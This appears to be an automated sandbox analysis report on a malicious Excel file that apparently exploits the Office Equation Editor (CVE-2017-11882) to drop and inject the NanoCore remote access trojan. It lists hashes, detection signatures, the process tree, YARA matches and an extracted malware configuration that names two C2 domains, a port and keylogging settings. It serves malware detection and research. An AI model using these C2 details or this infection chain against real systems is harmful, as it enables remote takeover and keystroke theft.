Play interactive tour

Edit tour

Analysis Report Ref 0180066743.xlsx

Overview

General Information

Sample Name:	Ref 0180066743.xlsx
Analysis ID:	431726
MD5:	dffc9e820070887fd0e4a4973e847a36
SHA1:	32c5185f4aa508cc60ad331e4b3046dce732135c
SHA256:	9d7b5114111ce6382d022e2e43344b2608db07ecbbf13da758dd220e8df90394
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates an undocumented autostart registry key

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Suspicious Process Start Without DLL

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 1616 cmdline: 'C:\Users\Public\vbc.exe' MD5: EB43B3C033BD76B51B90A51A6726A81C)

RegAsm.exe (PID: 2164 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\Public\vbc.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Roaming\win33.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8955:$x1: NanoCore.ClientPluginHost 0x8992:$x2: IClientNetworkHost 0xc4c5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x86bd:$a: NanoCore 0x86cd:$a: NanoCore 0x8901:$a: NanoCore 0x8915:$a: NanoCore 0x8955:$a: NanoCore 0x871c:$b: ClientPlugin 0x891e:$b: ClientPlugin 0x895e:$b: ClientPlugin 0x8843:$c: ProjectData 0x924a:$d: DESCrypto 0xadff:$i: get_Connected 0x9580:$j: #=q 0x95b0:$j: #=q 0x95cc:$j: #=q 0x95fc:$j: #=q 0x9618:$j: #=q 0x9634:$j: #=q 0x9664:$j: #=q 0x9680:$j: #=q 0x96c4:$j: #=q 0x96e0:$j: #=q
00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1447d:$x1: NanoCore.ClientPluginHost 0x144ba:$x2: IClientNetworkHost 0x17fed:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x141e5:$a: NanoCore 0x141f5:$a: NanoCore 0x14429:$a: NanoCore 0x1443d:$a: NanoCore 0x1447d:$a: NanoCore 0x14244:$b: ClientPlugin 0x14446:$b: ClientPlugin 0x14486:$b: ClientPlugin 0x1436b:$c: ProjectData 0x14d72:$d: DESCrypto 0x1c73e:$e: KeepAlive 0x1a72c:$g: LogClientMessage 0x16927:$i: get_Connected 0x150a8:$j: #=q 0x150d8:$j: #=q 0x150f4:$j: #=q 0x15124:$j: #=q 0x15140:$j: #=q 0x1515c:$j: #=q 0x1518c:$j: #=q 0x151a8:$j: #=q
00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111dd5:$x1: NanoCore.ClientPluginHost 0x111e12:$x2: IClientNetworkHost 0x115945:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x111b3d:$a: NanoCore 0x111b4d:$a: NanoCore 0x111d81:$a: NanoCore 0x111d95:$a: NanoCore 0x111dd5:$a: NanoCore 0x111b9c:$b: ClientPlugin 0x111d9e:$b: ClientPlugin 0x111dde:$b: ClientPlugin 0x111cc3:$c: ProjectData 0x1126ca:$d: DESCrypto 0x11a096:$e: KeepAlive 0x118084:$g: LogClientMessage 0x11427f:$i: get_Connected 0x112a00:$j: #=q 0x112a30:$j: #=q 0x112a4c:$j: #=q 0x112a7c:$j: #=q 0x112a98:$j: #=q 0x112ab4:$j: #=q 0x112ae4:$j: #=q 0x112b00:$j: #=q
00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1fb6f:$a: NanoCore 0x1fbc8:$a: NanoCore 0x1fc05:$a: NanoCore 0x1fc7e:$a: NanoCore 0x28972:$a: NanoCore 0x28997:$a: NanoCore 0x289f0:$a: NanoCore 0x38c1b:$a: NanoCore 0x38c41:$a: NanoCore 0x38c9d:$a: NanoCore 0x45b37:$a: NanoCore 0x45b90:$a: NanoCore 0x45bc3:$a: NanoCore 0x45def:$a: NanoCore 0x45e6b:$a: NanoCore 0x46484:$a: NanoCore 0x465cd:$a: NanoCore 0x46aa1:$a: NanoCore 0x46d88:$a: NanoCore 0x46d9f:$a: NanoCore 0x4c40d:$a: NanoCore
00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1a3b5:$a: NanoCore 0x1a40e:$a: NanoCore 0x1a44b:$a: NanoCore 0x1a4c4:$a: NanoCore 0x22f98:$a: NanoCore 0x22fbd:$a: NanoCore 0x23016:$a: NanoCore 0x331b3:$a: NanoCore 0x331d9:$a: NanoCore 0x33235:$a: NanoCore 0x4008a:$a: NanoCore 0x400e3:$a: NanoCore 0x40116:$a: NanoCore 0x40342:$a: NanoCore 0x403be:$a: NanoCore 0x409d7:$a: NanoCore 0x40b20:$a: NanoCore 0x40ff4:$a: NanoCore 0x412db:$a: NanoCore 0x412f2:$a: NanoCore 0x46890:$a: NanoCore
00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x89f4d:$x1: NanoCore.ClientPluginHost 0xb1f6d:$x1: NanoCore.ClientPluginHost 0x101f8d:$x1: NanoCore.ClientPluginHost 0x89f8a:$x2: IClientNetworkHost 0xb1faa:$x2: IClientNetworkHost 0x101fca:$x2: IClientNetworkHost 0x8dabd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xb5add:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x105afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x89cb5:$a: NanoCore 0x89cc5:$a: NanoCore 0x89ef9:$a: NanoCore 0x89f0d:$a: NanoCore 0x89f4d:$a: NanoCore 0xb1cd5:$a: NanoCore 0xb1ce5:$a: NanoCore 0xb1f19:$a: NanoCore 0xb1f2d:$a: NanoCore 0xb1f6d:$a: NanoCore 0x101cf5:$a: NanoCore 0x101d05:$a: NanoCore 0x101f39:$a: NanoCore 0x101f4d:$a: NanoCore 0x101f8d:$a: NanoCore 0x89d14:$b: ClientPlugin 0x89f16:$b: ClientPlugin 0x89f56:$b: ClientPlugin 0xb1d34:$b: ClientPlugin 0xb1f36:$b: ClientPlugin 0xb1f76:$b: ClientPlugin
Process Memory Space: vbc.exe PID: 1616	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x70df:$x1: NanoCore.ClientPluginHost 0x7140:$x2: IClientNetworkHost 0xc545:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x10404:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: vbc.exe PID: 1616	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: vbc.exe PID: 1616	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6be4:$a: NanoCore 0x6c00:$a: NanoCore 0x6d5b:$a: NanoCore 0x6d6a:$a: NanoCore 0x7043:$a: NanoCore 0x706f:$a: NanoCore 0x70df:$a: NanoCore 0xca6e:$a: NanoCore 0xca80:$a: NanoCore 0xcabc:$a: NanoCore 0x6c8b:$b: ClientPlugin 0x6db4:$b: ClientPlugin 0x7078:$b: ClientPlugin 0x70e8:$b: ClientPlugin 0xca89:$b: ClientPlugin 0xcac5:$b: ClientPlugin 0x6f01:$c: ProjectData 0xc9bb:$c: ProjectData 0x803d:$d: DESCrypto 0xd319:$d: DESCrypto 0xa6db:$i: get_Connected
Process Memory Space: RegAsm.exe PID: 2164	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xa546:$x1: NanoCore.ClientPluginHost 0xfd02:$x1: NanoCore.ClientPluginHost 0x19e29:$x1: NanoCore.ClientPluginHost 0x6a256:$x1: NanoCore.ClientPluginHost 0x8e21f:$x1: NanoCore.ClientPluginHost 0xeabbf:$x1: NanoCore.ClientPluginHost 0x1006ff:$x1: NanoCore.ClientPluginHost 0x10553f:$x1: NanoCore.ClientPluginHost 0x190fd8:$x1: NanoCore.ClientPluginHost 0x194c7d:$x1: NanoCore.ClientPluginHost 0x1e22c1:$x1: NanoCore.ClientPluginHost 0x1f6752:$x1: NanoCore.ClientPluginHost 0x1f966a:$x1: NanoCore.ClientPluginHost 0x203fcf:$x1: NanoCore.ClientPluginHost 0x216b73:$x1: NanoCore.ClientPluginHost 0x2195da:$x1: NanoCore.ClientPluginHost 0x21ca55:$x1: NanoCore.ClientPluginHost 0x21f660:$x1: NanoCore.ClientPluginHost 0x226827:$x1: NanoCore.ClientPluginHost 0x22b74c:$x1: NanoCore.ClientPluginHost 0x237f46:$x1: NanoCore.ClientPluginHost
Process Memory Space: RegAsm.exe PID: 2164	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2164	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xa546:$a: NanoCore 0xa5c0:$a: NanoCore 0xb14a:$a: NanoCore 0xb190:$a: NanoCore 0xba24:$a: NanoCore 0xc25e:$a: NanoCore 0xf848:$a: NanoCore 0xf8e9:$a: NanoCore 0xf94c:$a: NanoCore 0xfd02:$a: NanoCore 0xfdde:$a: NanoCore 0x1084b:$a: NanoCore 0x10a30:$a: NanoCore 0x10a7f:$a: NanoCore 0x10ad2:$a: NanoCore 0x10b01:$a: NanoCore 0x10d07:$a: NanoCore 0x10d7b:$a: NanoCore 0x11332:$a: NanoCore 0x1146e:$a: NanoCore 0x114ad:$a: NanoCore
Click to see the 55 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.RegAsm.exe.c10000.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
5.2.RegAsm.exe.c10000.11.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
5.2.RegAsm.exe.cb0000.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
5.2.RegAsm.exe.cb0000.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
4.2.vbc.exe.3627c48.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3627c48.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.vbc.exe.3627c48.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3627c48.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.RegAsm.exe.e80000.19.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
5.2.RegAsm.exe.e80000.19.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
5.2.RegAsm.exe.6c0000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
5.2.RegAsm.exe.6c0000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
